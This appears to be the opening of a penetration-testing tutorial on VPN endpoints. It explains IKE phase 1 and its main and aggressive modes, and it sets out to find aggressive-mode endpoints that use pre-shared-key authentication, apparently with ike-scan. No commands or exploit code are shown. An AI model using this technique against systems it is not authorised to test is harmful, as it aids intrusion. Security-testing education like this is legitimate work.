Pentesting VPN's ike-scan

Often during a pentest we may encounter VPN endpoints. However, finding vulnerabilities in those endpoints and exploiting them is not a well known method. VPN endpoints use Internet Key Exchange (IKE) protocol to set up a security association between multiple clients to establish a VPN tunnel.

IKE has two phases, phase 1 is responsible for setting up and establishing secure authenticated communication channel, and phase 2 encrypts and transports data.

Our focus of interest here would be phase 1; it uses two methods of exchanging keys:

• Main mode
• Aggressive mode

We will hunt for aggressive mode enabled VPN endpoints using PSK authentication.